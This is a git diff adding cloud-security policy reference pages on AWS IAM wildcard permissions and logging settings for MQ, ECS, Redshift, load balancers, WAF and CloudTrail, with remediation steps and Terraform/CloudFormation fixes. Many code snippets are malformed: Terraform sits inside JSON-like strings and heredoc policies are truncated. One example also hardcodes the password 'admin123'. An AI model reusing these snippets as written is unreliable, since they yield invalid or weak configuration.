[Amazon IAM console]. + +. In the navigation pane, choose * Policies*. + +. In the list of policies, choose the policy name of the policy to edit. ++ +You can use the Filter menu and the search box to filter the list of policies. + +. Choose the * Permissions * tab, then choose * Edit Policy*. + +. Identify any Action statements permitting actions access to all resources ("*"). + +. On the Review page, review the policy Summary, then click * Save Changes*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Arguments:* statement +* *Attribute*: action + +Example fix: + + +[source,go] +---- +resource "aws_iam_policy" "example" { + # ... other configuration ... + policy = < +---- + +. Detach the policy from all IAM Users. +[,bash] +---- +aws iam detach-user-policy --user-name & lt;iam_user> --policy-arn & lt;policy_arn> +---- +. Detach the policy from all IAM Groups. +[,bash] +---- +aws iam detach-group-policy --group-name & lt;iam_group> --policy-arn & lt;policy_arn> +---- +. Detach the policy from all IAM Roles. +[,bash] +---- +aws iam detach-role-policy --role-name & lt;iam_role> --policy-arn & lt;policy_arn> +---- +//// + +=== Fix-Buildtime + +*Terraform* + +*Resource: aws_iam_policy* + + + + +[source,go] +---- +resource "aws_iam_policy" "pass1" { + name = "pass1" + path = "/" + policy = <` + +. Detach the policy from all IAM Users: ++ +`aws iam detach-user-policy --user-name & lt;iam_user> --policy-arn & lt;policy_arn>` + +. Detach the policy from all IAM Groups: ++ +`aws iam detach-group-policy --group-name & lt;iam_group> --policy-arn & lt;policy_arn>` + +. Detach the policy from all IAM Roles: ++ +`aws iam detach-role-policy --role-name &l t;iam_role> --policy-arn & lt;policy_arn>` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_iam_policy +* *Arguments:* policy - (Required) The policy document. + +This is a JSON formatted string. +For more information about building AWS IAM policy documents with Terraform, see the AWS IAM Policy Document Guide. + + +[source,go] +---- +resource "aws_iam_policy" "policy" { + name = "test_policy" + path = "/" + description = "My test policy" + + policy = < ++ SourceSecurityGroups: ++ - ... + + Nodegroup2: + Type: 'AWS::EKS::Nodegroup' + Properties: + ... +- RemoteAccess: +- ... +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/aws-logging-policies.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/aws-logging-policies.adoc new file mode 100644 index 000000000..8511b697d --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/aws-logging-policies.adoc @@ -0,0 +1,140 @@ +== AWS Logging Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-aws-logging-10.adoc[Amazon MQ Broker logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerLogging.py[CKV_AWS_48] +|MEDIUM + + +|xref:bc-aws-logging-11.adoc[AWS ECS cluster with container insights feature disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py[CKV_AWS_65] +|LOW + + +|xref:bc-aws-logging-12.adoc[AWS Redshift database does not have audit logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py[CKV_AWS_71] +|MEDIUM + + +|xref:bc-aws-logging-22.adoc[AWS Elastic Load Balancer v2 (ELBv2) with access log disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py[CKV_AWS_91] +|MEDIUM + + +|xref:bc-aws-logging-23.adoc[AWS Elastic Load Balancer (Classic) with access log disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py[CKV_AWS_92] +|MEDIUM + + +|xref:bc-aws-logging-24.adoc[Neptune logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py[CKV_AWS_101] +|HIGH + + + +|xref:bc-aws-logging-31.adoc[AWS WAF Web Access Control Lists logging is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasLogs.py[CKV_AWS_176] +|LOW + + +|xref:bc-aws-logging-33.adoc[AWS WAF2 does not have a Logging Configuration] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml[CKV2_AWS_31] +|LOW + + +|xref:ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc[API Gateway stage does not have logging level defined appropriately] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml[CKV2_AWS_4] +|LOW + + +|xref:ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc[CloudTrail trail is not integrated with CloudWatch Log] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml[CKV2_AWS_10] +|MEDIUM + + +|xref:ensure-that-cloudformation-stacks-are-sending-event-notifications-to-an-sns-topic.adoc[AWS CloudFormation stack configured without SNS topic] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py[CKV_AWS_124] +|LOW + + +|xref:ensure-that-detailed-monitoring-is-enabled-for-ec2-instances.adoc[AWS EC2 instance detailed monitoring disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py[CKV_AWS_126] +|MEDIUM + + +|xref:ensure-that-enhanced-monitoring-is-enabled-for-amazon-rds-instances.adoc[AWS Amazon RDS instances Enhanced Monitoring is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py[CKV_AWS_118] +|LOW + + +|xref:logging-1.adoc[AWS CloudTrail is not enabled with multi trail and not capturing all management events] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py[CKV_AWS_67] +|LOW + + +|xref:logging-13.adoc[AWS CloudWatch Log groups not configured with definite retention days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py[CKV_AWS_66] +|LOW + + + +|xref:logging-15.adoc[API Gateway does not have X-Ray tracing enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayXray.py[CKV_AWS_73] +|LOW + + +|xref:logging-16.adoc[Global Accelerator does not have Flow logs enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py[CKV_AWS_75] +|LOW + + +|xref:logging-17.adoc[API Gateway does not have access logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py[CKV_AWS_76] +|LOW + + +|xref:logging-18.adoc[Amazon MSK cluster logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterLogging.py[CKV_AWS_80] +|MEDIUM + + +|xref:logging-19.adoc[AWS DocumentDB logging is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/DocDBLogging.py[CKV_AWS_85] +|MEDIUM + + +|xref:logging-2.adoc[AWS CloudTrail log validation is not enabled in all regions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py[CKV_AWS_36] +|LOW + + +|xref:logging-20.adoc[AWS CloudFront distribution with access logging disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CloudfrontDistributionLogging.py[CKV_AWS_86] +|MEDIUM + +|xref:logging-5-enable-aws-config-regions.adoc[AWS config is not enabled in all regions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py[CKV_AWS_121] +|MEDIUM + + +|xref:logging-7.adoc[AWS CloudTrail logs are not encrypted using Customer Master Keys (CMKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py[CKV_AWS_35] +|MEDIUM + + +|xref:logging-8.adoc[AWS Customer Master Key (CMK) rotation is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KMSRotation.py[CKV_AWS_7] +|MEDIUM + + +|xref:logging-9-enable-vpc-flow-logging.adoc[AWS VPC Flow Logs not enabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml[CKV2_AWS_11] +|MEDIUM + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-10.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-10.adoc new file mode 100644 index 000000000..dd7b58f04 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-10.adoc @@ -0,0 +1,68 @@ +== Amazon MQ Broker logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| bbb2b85f-e78c-4202-8f45-7eb40d177b8c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerLogging.py[CKV_AWS_48] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon MQ is a broker service built on Apache ActiveMQ. +As a message broker, MQ allows applications to communicate using various programming languages, operating systems and formal messaging protocols. +Amazon MQ is integrated with CloudTrail and provides a record of the Amazon MQ calls made by a user, role, or AWS service. +It supports logging both the request parameters and the responses for APIs as events in CloudTrail. +Logging MQ ensures developers can trace all requests and responses, and ensure they are only used for their predefined message brokering settings. +We recommend you enable Amazon MQ Broker Logging. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_mq_broker" "enabled" { + broker_name = "example" + engine_type = "ActiveMQ" + engine_version = "5.16.3" + host_instance_type = "mq.t3.micro" + + user { + password = "admin123" + username = "admin" + } + + + logs { + general = true + } + +}", +} +---- +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11.adoc new file mode 100644 index 000000000..a52324d65 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-11.adoc @@ -0,0 +1,115 @@ +== AWS ECS cluster with container insights feature disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ad3524a5-6f8f-4eab-9bd1-2a53850070db + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py[CKV_AWS_65] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Container Insights can be used to collect, aggregate, and summarize metrics and logs from containerized applications and microservices. +They can also be extended to collect metrics at the cluster, task, and service levels. +Using Container Insights allows you to monitor, troubleshoot, and set alarms for all your Amazon ECS resources. +It provides a simple to use native and fully managed service for managing ECS issues. +We recommend that for existing clusters you use the AWS CLI; +and for new clusters, you use either the Amazon ECS console, or the AWS CLI. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the https://console.aws.amazon.com/ecs/ [Amazon ECS console]. + +. In the navigation pane, choose * Account Settings*. + +. To enable the Container Insights default opt-in, check the box at the bottom of the page. + + +* CLI Command* + + +You can use the AWS CLI to set account-level permission to enable Container Insights for any new Amazon ECS clusters created in your account. +To do so, enter the following command. +---- +aws ecs put-account-setting +--name "containerInsights" +--value "enabled" +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_ecs_cluster +* *Arguments:* setting + + +[source,go] +---- +{ + "resource "aws_ecs_cluster" "foo" { + ... + name = "white-hart" ++ setting { ++ name = "containerInsights" ++ value = "enabled" ++ } +}", + + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ECS::Cluster +* *Arguments:* Properties.ClusterSettings + + +[source,yaml] +---- +{ + "Resources: + ECSCluster: + Type: 'AWS::ECS::Cluster' + Properties: + ... ++ ClusterSettings: ++ - Name: 'containerInsights' ++ Value: 'enabled'", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12.adoc new file mode 100644 index 000000000..287c04ab7 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-12.adoc @@ -0,0 +1,107 @@ +== AWS Redshift database does not have audit logging enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 91c941aa-d110-4b33-9934-aadd86b1a4d9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py[CKV_AWS_71] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Amazon Redshift logs information about connections and user activities in your database. +These logs help you to monitor the database for security and troubleshooting purposes, a process often referred to as database auditing. +The logs are stored in Amazon S3 buckets. +These provide convenient access with data security features for users who are responsible for monitoring activities in the database. +Enabling S3 bucket logging on Redshift databases allows you to capture all events which may affect the database, this is useful in security and incident response workflows. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To enable Redshift to S3 bucket logging using the AWS Management Console, follow these steps: + +. Log in to the AWS Management Console at [https://console.aws.amazon.com/]. + +. Open the * https://console.aws.amazon.com/redshift [Amazon Redshift console]*. + +. On the navigation menu, choose * Clusters*, then choose the cluster that you want to update. + +. Choose the * Maintenance and Monitoring* tab. ++ +Then view the * Audit logging* section. + +. Choose * Edit **tab. + +. On the Configure audit logging page, choose to Enable audit logging and enter your choices regarding where the logs are stored. + +. Click * Confirm*. +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_redshift_cluster +* *Arguments:* logging/enable is set to true. +An example terraform definition of an Amazon Redshift database with logging enabled, resolving the violation: + + +[source,go] +---- +{ + " resource "aws_redshift_cluster" "default" { + ... + cluster_type = "single-node" ++ logging { ++ enable = "true" ++ } + }", + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Redshift::Cluster +* *Arguments:* Properties.BucketName + + +[source,yaml] +---- +{ + "Type: "AWS::Redshift::Cluster" + Properties: + ... ++ LoggingProperties: ++ BucketName: "your_bucket"", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22.adoc new file mode 100644 index 000000000..eeb8ec075 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-22.adoc @@ -0,0 +1,124 @@ +== AWS Elastic Load Balancer v2 (ELBv2) with access log disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| f2a2bcf1-2966-4cb5-9230-bd39c9903a02 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBv2AccessLogs.py[CKV_AWS_91] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +ELBv2 provide access logs that capture information about the TLS requests sent to NLBs. +These access logs can be used to analyze traffic patterns and troubleshoot security and operational issues. +Access logging is an optional feature of ELB that is disabled by default. +There is no additional charge for access logs. +You are charged storage costs for Amazon S3, but not charged for the bandwidth. +After you enable access logging for your load balancer, ELBv2 captures the logs as compressed files and stores them in the Amazon S3 bucket that you specify. + +//// +=== Fix - Runtime + + +* AWS Console* + + + +. Go to the Amazon EC2 console at https://console.aws.amazon.com/ec2/. ++ +In the navigation pane, choose Load Balancers. + +. Select your load balancer. + +. On the Description tab, choose Edit attributes. + +. On the Edit load balancer attributes page, do the following: + +. For Access logs, choose Enable and specify the name of an existing bucket or a name for a new bucket. + +. Choose Save. + + +* CLI Command* + + + + +[source,shell] +---- +{ + "aws elbv2 modify-load-balancer-attributes --load-balancer-arn arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188 --attributes Key=access_logs.s3.enabled,Value=true Key=access_logs.s3.bucket,Value=my-loadbalancer-logs Key=access_logs.s3.prefix,Value=myapp", +} +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_lb +* *Arguments:* access_logs - (Optional) An Access Logs block. +Access Logs documented below. + + +[source,go] +---- +{ + "resource "aws_lb" "test" { + ... + name = "test-lb-tf" ++ access_logs { ++ bucket = aws_s3_bucket.lb_logs.bucket ++ prefix = "test-lb" ++ enabled = true ++ } +}", + + +} +---- + + +*CloudFormation* + + +*Resource: AWS::ElasticLoadBalancingV2::LoadBalancer *Argument: Properties.LoadBalancerAttributes + + +[source,yaml] +---- +{ + "Resources: + Resource0: + Type: 'AWS::ElasticLoadBalancingV2::LoadBalancer' + Properties: + ... + LoadBalancerAttributes: ++ - Key: access_logs.s3.enabled ++ Value: "true" +", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23.adoc new file mode 100644 index 000000000..a1feb898f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-23.adoc @@ -0,0 +1,96 @@ +== AWS Elastic Load Balancer (Classic) with access log disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b675c604-e886-43aa-a60f-a9ad1f3742d3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py[CKV_AWS_92] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +These access logs can be used to analyze traffic patterns and troubleshoot security and operational issues. +Access logging is an optional feature of ELB that is disabled by default. + +=== Fix - Runtime + + +*AWS Console* + + +TBA + + +*CLI Command* + + + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_elb +* *Arguments:* access_logs + + +[source,go] +---- +{ + "resource "aws_elb" "example" { + ... + name = "test-lb-tf" ++ access_logs { ++ bucket = aws_s3_bucket.lb_logs.bucket ++ enabled = true ++ } +}", + + +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::ElasticLoadBalancing::LoadBalancer +* *Arguments:* Properties.AccessLoggingPolicy.Enabled + + +[source,yaml] +---- +{ + "Resources: + Resource0: + Type: 'AWS::ElasticLoadBalancing::LoadBalancer' + Properties: + ... + AccessLoggingPolicy: + ... ++ Enabled: true +", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-24.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-24.adoc new file mode 100644 index 000000000..cf38d4166 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-24.adoc @@ -0,0 +1,76 @@ +== Neptune logging is not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a520f182-c20b-4042-95ca-6e0caccf6219 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterLogging.py[CKV_AWS_101] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +These logs can be used to analyse traffic patterns and troubleshoot security and operational issues. +It is recommended that you set your cluster to optionally export its' logs to AWS Cloudwatch. + +=== Fix - Runtime + + +*AWS Console* + + +TBA + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_neptune_cluster +* *Arguments:* enable_cloudwatch_logs_exports + + +[source,go] +---- +resource "aws_neptune_cluster" "Pike" { + cluster_identifier = var.DBClusterIdentifier + + ... ++ enable_cloudwatch_logs_exports = ["audit"] +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::Neptune::DBCluster +* *Arguments:* Properties.EnableCloudWatchLogExports + + +[source,yaml] +---- +Type: "AWS::Neptune::DBCluster" + Properties: + ... ++ EnableCloudwatchLogsExports: ["audit"] +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-31.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-31.adoc new file mode 100644 index 000000000..c6dc851d3 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-31.adoc @@ -0,0 +1,71 @@ +== AWS WAF Web Access Control Lists logging is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6107761b-b8c4-4c2c-9418-e264f5dc11e6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFHasLogs.py[CKV_AWS_176] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Amazon WAF is a web application firewall service that lets you monitor web requests that are forwarded to Amazon API Gateway APIs, Amazon CloudFront distributions, or Application Load Balancers in order to help protect them from attacks. +To get detailed information about the web traffic analyzed by your Web Access Control Lists (Web ACLs) you must enable logging. +The log entries include the time that Amazon WAF received the request from your AWS resource, detailed information about the request, and the action for the rule that each request matched. +You can also send these logs to an Amazon Kinesis Firehose delivery stream with a configured storage destination. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_waf_web_acl +* *Attribute:* logging_configuration + + +[source,text] +---- +{ + "resource "aws_waf_web_acl" "example" { + # ... other configuration ... + logging_configuration { + log_destination = "${aws_kinesis_firehose_delivery_stream.example.arn}" + + redacted_fields { + field_to_match { + type = "URI" + } + + + field_to_match { + data = "referer" + type = "HEADER" + } + + } + } + +} +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-33.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-33.adoc new file mode 100644 index 000000000..7104a1174 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-33.adoc @@ -0,0 +1,74 @@ +== AWS WAF2 does not have a Logging Configuration + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2ab53e6b-4272-43a8-ba6a-cc30add35ca9 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml[CKV2_AWS_31] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +You can enable comprehensive logging on a web access control list (web ACL) using an Amazon Kinesis Data Firehose stream destined to an Amazon S3 bucket in the same Region. +To do so, you must use three AWS services: AWS WAF to create the logs Kinesis Data Firehose to receive the logs Amazon S3 to store the logs Note: AWS WAF and Kinesis Data Firehose must be running in the same Region. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_wafv2_web_acl +* *Attribute*: visibility_config - (Required) Defines and enables Amazon CloudWatch metrics and web request sample collection. +See Visibility Configuration below for details. + + +[source,go] +---- +{ + "resource "aws_wafv2_web_acl" "example" { + name = "rate-based-example" + description = "Example of a rate based statement." + scope = "REGIONAL" + + ... +++ visibility_config { + cloudwatch_metrics_enabled = false + metric_name = "friendly-rule-metric-name" + sampled_requests_enabled = false + } + + } + +++ resource "aws_wafv2_web_acl_logging_configuration" "example" { + log_destination_configs = [aws_kinesis_firehose_delivery_stream.example.arn] + resource_arn = aws_wafv2_web_acl.example.arn + redacted_fields { + single_header { + name = "user-agent" + } + + } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc new file mode 100644 index 000000000..a001dcac4 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-api-gateway-stage-have-logging-level-defined-as-appropiate.adoc @@ -0,0 +1,111 @@ +== API Gateway stage does not have logging level defined appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db7e1267-8931-436b-a841-8daf058afffe + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml[CKV2_AWS_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +It is generally a good practice to define the logging level for your API Gateway stages appropriately because it allows you to capture and review detailed information about the requests and responses handled by your API. +This can be especially useful for debugging issues, analyzing the usage patterns of your API, and identifying potential performance bottlenecks. +By default, the logging level for API Gateway stages is set to "OFF", which means that no logs are generated. +You can choose to enable logging at the "ERROR" level, which will capture only log entries that correspond to error responses generated by your API. +Alternatively, you can enable logging at the "INFO" level, which will capture log entries for both error responses and successful requests. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_api_gateway_rest_api, aws_api_gateway_deployment, aws_api_gateway_method_settings + + +[source,go] +---- +{ + "resource "aws_api_gateway_rest_api" "ok_example" { + body = jsonencode({ + openapi = "3.0.1" + info = { + title = "ok_example" + version = "1.0" + } + + paths = { + "/path1" = { + get = { + x-amazon-apigateway-integration = { + httpMethod = "GET" + payloadFormatVersion = "1.0" + type = "HTTP_PROXY" + uri = "https://ip-ranges.amazonaws.com/ip-ranges.json" + } + + } + } + + } + }) + + + name = "ok_example" +} + + +resource "aws_api_gateway_deployment" "ok_example" { + rest_api_id = aws_api_gateway_rest_api.ok_example.id + + triggers = { + redeployment = sha1(jsonencode(aws_api_gateway_rest_api.ok_example.body)) + } + + + lifecycle { + create_before_destroy = true + } + +} + +resource "aws_api_gateway_stage" "ok_example" { + deployment_id = aws_api_gateway_deployment.ok_example.id + rest_api_id = aws_api_gateway_rest_api.ok_example.id + stage_name = "ok_example" +} + + +resource "aws_api_gateway_method_settings" "all" { + rest_api_id = aws_api_gateway_rest_api.ok_example.id + stage_name = aws_api_gateway_stage.ok_example.stage_name + method_path = "*/*" + + settings { + metrics_enabled = true + logging_level = "ERROR" + } + +}", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc new file mode 100644 index 000000000..f77d75be2 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-cloudtrail-trails-are-integrated-with-cloudwatch-logs.adoc @@ -0,0 +1,62 @@ +== CloudTrail trail is not integrated with CloudWatch Log + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0d07ac51-fbfe-44fe-8edb-3314c9995ee0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml[CKV2_AWS_10] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS CloudTrail is a web service that records AWS API calls made in a given AWS account. +The recorded information includes the identity of the API caller, the time of the API call, the source IP address of the API caller, the request parameters, and the response elements returned by the AWS service. +CloudTrail uses Amazon S3 for log file storage and delivery, so log files are stored durably. +In addition to capturing CloudTrail logs within a specified S3 bucket for long term analysis, realtime analysis can be performed by configuring CloudTrail to send logs to CloudWatch logs. +For a trail that is enabled in all regions in an account, CloudTrail sends log files from all those regions to a CloudWatch logs log group. +It is recommended that CloudTrail logs be sent to CloudWatch logs. + +NOTE: The intent of this recommendation is to ensure AWS account activity is being captured, monitored, and appropriately alarmed on. CloudWatch logs is a native way to accomplish this using AWS services but does not preclude the use of an alternate solution. + +Sending CloudTrail logs to CloudWatch logs will facilitate real-time and historic activity logging based on user, API, resource, and IP address, and provides opportunity to establish alarms and notifications for anomalous or sensitivity account activity. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_cloudtrail +* *Arguments:* cloud_watch_logs_group_arn + + +[source,go] +---- +{ + "resource "aws_cloudtrail" "aws_cloudtrail_ok" { + name = "tf-trail-foobar" + cloud_watch_logs_group_arn = "${aws_cloudwatch_log_group.example.arn}:*" +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc new file mode 100644 index 000000000..b21bb25f2 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-logging-policies/ensure-postgres-rds-as-aws-db-instance-has-query-logging-enabled.adoc @@ -0,0 +1,43 @@ +== AWS Postgres RDS have Query Logging disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a31de650-cada-4311-97c9-460f7d48e9e7 + +|Checkov Check ID +| 